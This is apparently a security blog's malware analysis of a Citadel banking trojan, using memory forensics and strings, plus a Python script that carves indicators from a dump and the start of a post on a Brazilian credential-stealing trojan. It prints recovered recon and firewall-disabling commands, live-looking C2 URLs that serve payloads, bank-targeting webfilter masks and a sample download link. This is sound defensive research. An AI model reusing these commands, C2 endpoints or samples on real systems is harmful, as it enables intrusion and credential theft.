<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A000 ASCII "ess",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A004 ASCII "NtQueryInformati"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A014 ASCII "onProcess",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A020 ASCII "RtlUserThreadSta"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A030 ASCII "rt",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A034 ASCII "LdrLoadDll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A040 ASCII "LdrGetDllHandle",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A050 ASCII ".reloc",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A060 UNICODE ".dat",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A06C ASCII "RFB 003.003</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A07C ASCII "RFB ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A08C UNICODE ".txt",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A10C ASCII "https://",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A118 ASCII "User-Agent",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A124 ASCII "Cookie",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A12C ASCII "Accept-Language",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A13C ASCII "Accept-Encoding",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A14C ASCII "HTTP/1.",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A154 ASCII "Transfer-Encodin"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A164 ASCII "g",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A168 ASCII "chunked",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A170 ASCII "Connection",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A17C ASCII "close",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A184 ASCII "Proxy-Connection"</span></div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Dynamic Analysis (DumpIt + Volatility)</b></span><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Volatility</span><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">pslist</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81bc97c0 System 4 0 56 661 ------ 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81952b10 smss.exe 528 4 3 19 ------ 0 2014-08-22 20:45:49 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81954b60 csrss.exe 592 528 11 378 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819abb60 winlogon.exe 616 528 19 261 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a5aad0 services.exe 668 616 16 247 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a4a748 lsass.exe 680 616 25 349 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a0f020 svchost.exe 880 668 18 212 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81904da0 svchost.exe 956 668 9 220 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a04c30 svchost.exe 1048 668 76 1312 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a1b428 svchost.exe 1108 668 7 81 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x8191f020 svchost.exe 1136 668 15 201 0 0 2014-08-22 20:45:52 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x818e4230 explorer.exe 1508 1472 31 648 0 0 2014-08-22 20:45:53 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x818fc318 spoolsv.exe 1612 668 14 116 0 0 2014-08-22 20:45:54 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819c9da0 smsniff.exe 360 1508 3 79 0 0 2014-08-22 20:46:03 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819aebe0 wuauclt.exe 452 1048 8 143 0 0 2014-08-22 20:46:06 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819c5980 alg.exe 1240 668 6 101 0 0 2014-08-22 20:46:07 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819c4c10 udpi.exe 796 720 0 -------- 0 0 2014-08-22 20:47:21 UTC+0000 2014-08-22 20:47:26 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81947020 DumpIt.exe 1428 1508 2 57 0 0 2014-08-22 20:48:37 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Active connections for PID 1508, which is explorer.exe</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Offset(P) Local Address Remote Address Pid</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>---------- ------------------------- ------------------------- ---</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x01d8ed80 10.0.2.15:1041 23.228.250.83:80 1508</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x01d8f418 10.0.2.15:1037 23.228.250.83:80 1508</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>The Windows firewall is disabled.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>C:\Python27\Scripts>vol.py -f memory.dmp printkey -K "ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Volatility Foundation Volatility Framework 2.4</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Legend: (S) = Stable (V) = Volatile</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>----------------------------</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Key name: StandardProfile (S)</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Last updated: 2011-07-15 21:12:13 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Subkeys:</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> (S) AuthorizedApplications</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Values:</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD EnableFirewall : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DoNotAllowExceptions : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DisableNotifications : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DisableUnicastResponsesToMulticastBroadcast : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Searching for strings in the memory dump of the infected PC.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The trojan scans the PC's configuration and sends the result to the attacker.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>1180 Console 0 3.876 KB</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>tasklist.exe 1772 Console 0 5.268 KB</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>ipconfig /all</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Configuración IP de Windows</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Nombre del host . . . . . . . . . : Equipo01</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Sufijo DNS principal . . . . . . : </b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Tipo de nodo . . . . . . . . . . : desconocido</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Enrutamiento habilitado. . . . . .: No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Proxy WINS habilitado. . . . . : No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Adaptador Ethernet Conexión de área local :</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Sufijo de conexión específica DNS : </b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Descripción. . . . . . . . . . . : Adaptador Ethernet PCI AMD PCNET Family</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Dirección física. . . . . . . . . : 08-00-27-80-70-30</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> DHCP habilitado. . . . . . . . . : No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Autoconfiguración habilitada. . . : Sí</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Dirección IP. . . . . . . . . . . : 10.0.2.15</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Máscara de subred . . . . . . . . : 255.255.255.0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Puerta de enlace predeterminada : 10.0.2.2</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Servidor DHCP . . . . . . . . . . : 10.0.2.2</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Servidores DNS . . . . . . . . . .: 10.0.2.3</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Concesión obtenida . . . . . . . : viernes, 22 de agosto de 2014 17:45:52</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Concesión expira . . . . . . . . .: sábado, 23 de agosto de 2014 17:45:52</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>netsh firewall set opmode disable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Aceptar</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>exit</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>C:\WINDOWS\Explorer.EXE</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Microsoft Corporation | Sistema operativo Microsoft® Windows® | 6.00.2900.5512</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Equipo01\Administrador</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Command and control</span></b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php|file=soft.exe</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/gate.php</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://poroto6a.ru/cphouse/file.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>=con</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>hostname</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>tasklist</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>ipconfig /all</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>netsh firewall set opmode disable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>#*wellsfargo.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>@*payment.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>!http://*.com/*.jpg</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>*facebook.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>*antivirus*=209.85.22</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://poroto666bbb.ru/cphouse/file.php|file=config.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php|file=config.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Peru-Panama</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
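<span style="font-family: Arial, Helvetica, sans-serif;">Everything in the last three sections (the shell transcript with the recon commands, the firewall change, the gate URLs and the webfilter masks) can be pulled out of a raw image with a handful of regular expressions instead of reading through strings output by hand. The script below is an added example, not tooling from the post and not Citadel code: it carves those indicators from a memory dump and separately parses Volatility printkey output to confirm EnableFirewall. SAMPLE_DUMP and SAMPLE_PRINTKEY are constructed stand-ins built from the strings above, and the URL regex is tuned to the gate.php / file.php|file= layout seen here rather than being a general URL matcher.</span><br />

```python
import re

# Added example, not from the post: carve the Citadel indicators described
# above out of a raw memory image.  SAMPLE_DUMP is a constructed stand-in
# for memory.dmp, assembled from the strings the post recovered.

# C2 URLs: host, a PHP gate, and the optional "|file=<name>" download selector
# (tuned to the cphouse/gate.php and file.php|file= layout seen in this dump).
URL_RE = re.compile(
    rb"https?://[a-z0-9.-]+\.[a-z]{2,}/[a-z0-9_./-]*?\.php(?:\|file=[a-z0-9_.-]+)?",
    re.IGNORECASE,
)
# Zeus/Citadel-style webfilter masks: optional !/@/# flag, wildcards, a "/*" part.
MASK_RE = re.compile(rb"[!@#]?[A-Za-z0-9*./:-]*\*[A-Za-z0-9*./:-]*/\*[A-Za-z0-9*./-]*")
# Remote-shell transcript lines as they sit in memory: "==========[ cwd ]>command".
RECON_RE = re.compile(rb"={10}\[ [^\]\r\n]+ \]>([^\r\n]+)")
FIREWALL_OFF = b"netsh firewall set opmode disable"

# Constructed sample: a few bytes of junk plus the strings found in the post.
SAMPLE_DUMP = (
    b"\x00\x00\x7f\xffjunk\x00"
    b"http://nrgg1731.ru/cphouse/file.php|file=soft.exe#N\x00"
    b"http://nrgg1731.ru/cphouse/gate.php2N\x00"
    b"http://poroto666bbb.ru/cphouse/file.php|file=config.dll\x00"
    b"==========[ C:\\Documents and Settings\\Administrador ]>ipconfig /all\r\n"
    b"Nombre del host . . . : Equipo01\r\n"
    b"==========[ C:\\Documents and Settings\\Administrador ]>netsh firewall set opmode disable\r\n"
    b"Aceptar\r\n"
    b"==========[ C:\\Documents and Settings\\Administrador ]>\r\n"
    b"==========[ C:\\Documents and Settings\\Administrador ]>exit\r\n"
    b"#*wellsfargo.com/*\x00@*payment.com/*\x00!http://*.com/*.jpg\x00*facebook.com/*\x00"
)

# Constructed sample of Volatility printkey output for the StandardProfile key.
SAMPLE_PRINTKEY = """\
Registry: \\Device\\HarddiskVolume1\\WINDOWS\\system32\\config\\system
Key name: StandardProfile (S)
Values:
REG_DWORD     EnableFirewall       : (S) 0
REG_DWORD     DoNotAllowExceptions : (S) 0
"""


def triage(dump: bytes) -> dict:
    """Return the indicators found in a raw memory image."""
    urls = sorted({m.decode("latin-1") for m in URL_RE.findall(dump)})
    masks = sorted({m.decode("latin-1") for m in MASK_RE.findall(dump)})
    commands = [m.decode("latin-1").strip() for m in RECON_RE.findall(dump)]
    return {
        "c2_hosts": sorted({u.split("/")[2] for u in urls}),
        "c2_urls": urls,
        "webfilter_masks": masks,
        "recon_commands": commands,
        "firewall_disabled": FIREWALL_OFF in dump,
    }


def firewall_enabled(printkey_text: str):
    """Parse printkey output for StandardProfile\\EnableFirewall.

    Returns True/False, or None when the value is not present in the text.
    """
    m = re.search(r"REG_DWORD\s+EnableFirewall\s*:\s*\([SV]\)\s*(\d+)", printkey_text)
    return None if m is None else m.group(1) != "0"


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_DUMP), indent=2))
    print("firewall enabled:", firewall_enabled(SAMPLE_PRINTKEY))
```

<span style="font-family: Arial, Helvetica, sans-serif;">Run it against a real image with triage(open("memory.dmp", "rb").read()). On a full dump the mask regex will also pick up unrelated wildcards, so treat that list as candidates to review rather than a clean IOC set; the recon transcript and the gate URLs are specific enough to act on directly.</span><br />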
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BCv9fMZZfgB-w2JlnWyYjzfgFGIK6gE4h0BBbFtxGZ-TrY6pucnuX-R2-8BGeLDkLhtp4bnVIRnsBFoxZSZF1XGJANEWqS59XIQUzlBWGibo7YrtD7VEwMDV-0YBDaQtM4lZ1h28QQk/s1600/cc02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BCv9fMZZfgB-w2JlnWyYjzfgFGIK6gE4h0BBbFtxGZ-TrY6pucnuX-R2-8BGeLDkLhtp4bnVIRnsBFoxZSZF1XGJANEWqS59XIQUzlBWGibo7YrtD7VEwMDV-0YBDaQtM4lZ1h28QQk/s1600/cc02.png" height="348" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUehydm4TaM9JQQXxAdHoDz-w2LYn7HMQhyWT4GAZLH4KR6BUZZRJX01EUWDn4DjprsyW19URDCqahmAnp4fhL1pVFfTC4TsJGQlHioEgpBoDMFB4oCYuJ9nMH-5yKzNPil7EJBInPq_I/s1600/cc01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUehydm4TaM9JQQXxAdHoDz-w2LYn7HMQhyWT4GAZLH4KR6BUZZRJX01EUWDn4DjprsyW19URDCqahmAnp4fhL1pVFfTC4TsJGQlHioEgpBoDMFB4oCYuJ9nMH-5yKzNPil7EJBInPq_I/s1600/cc01.png" height="534" width="640" /></a></div>
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Sample: https://dl.dropboxusercontent.com/u/80008916/Citadel-22-08-14.zip</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now. @Dkavalanche 2014</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>@Dkavalanche, 2014-08-04<br /><b><span style="font-family: Arial, Helvetica, sans-serif;">Brazilian trojan steals hundreds of records.</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Here is another sample of this already familiar Screen Overlay trojan. This time it has stolen hundreds of records of every kind: banking credentials (ITAU, Caixa, Banco do Brasil) as well as e-mail accounts (Hotmail, Gmail, UOL, Yahoo, POP3). The stolen data is dropped on a cloud server without any encryption, so anyone curious can read it...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Thanks to <a href="https://twitter.com/rfb_">Raul</a> for sending in this malware.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtFeHbB17DWAET-ZxhItY_ZfCDnv40md6RmEPdwXA3I6jhC76FOcjb47k3osWT8Z8DymoXS2747M4wNFQhFth4HJYRKWkGvS0pqFr0i5Fa5e77gH_D9cCbyVyy6dB2pKkL8wrANX1mShg/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtFeHbB17DWAET-ZxhItY_ZfCDnv40md6RmEPdwXA3I6jhC76FOcjb47k3osWT8Z8DymoXS2747M4wNFQhFth4HJYRKWkGvS0pqFr0i5Fa5e77gH_D9cCbyVyy6dB2pKkL8wrANX1mShg/s1600/fake.jpg" height="488" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Downloader:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis of the attached file</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu818cgkps09FoLe4LpaWWP3lJUqKlQqGWLykWaIVoaoK6vw1KJOuiavS8UCZsiZabexXxuFKArrwFnD2Skp1eSLctrcbnxY0_UzC8hZ1efLTsq65NzcUBcp2sZ2cUfh_NkgzmsHW_UOc/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu818cgkps09FoLe4LpaWWP3lJUqKlQqGWLykWaIVoaoK6vw1KJOuiavS8UCZsiZabexXxuFKArrwFnD2Skp1eSLctrcbnxY0_UzC8hZ1efLTsq65NzcUBcp2sZ2cUfh_NkgzmsHW_UOc/s1600/vt1.jpg" height="182" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It is a .CPL compiled with Delphi 7.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Some interesting strings:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004917AC &lt;AnsiString&gt; 'Brasil'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004917BC &lt;AnsiString&gt; 'E473BA5D9C48FB27D679AD3790C3DA67995994B66D934F'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004917F4 &lt;AnsiString&gt; '\\Desk'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491804 &lt;AnsiString&gt; 'Settings\\'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491818 &lt;AnsiString&gt; '\\D'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491824 &lt;AnsiString&gt; '\\'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491830 &lt;AnsiString&gt; 'D'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0049183C &lt;AnsiString&gt; 'a'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491848 &lt;AnsiString&gt; 'd'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491854 &lt;AnsiString&gt; 'o'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491860 &lt;AnsiString&gt; 's'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0049186C &lt;AnsiString&gt; ' '</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491878 &lt;AnsiString&gt; 'e'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491884 &lt;AnsiString&gt; 'aplicativos\\'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0049189C &lt;AnsiString&gt; 'Users\\'</span></div>
<div class="separator" style="clear: both;">
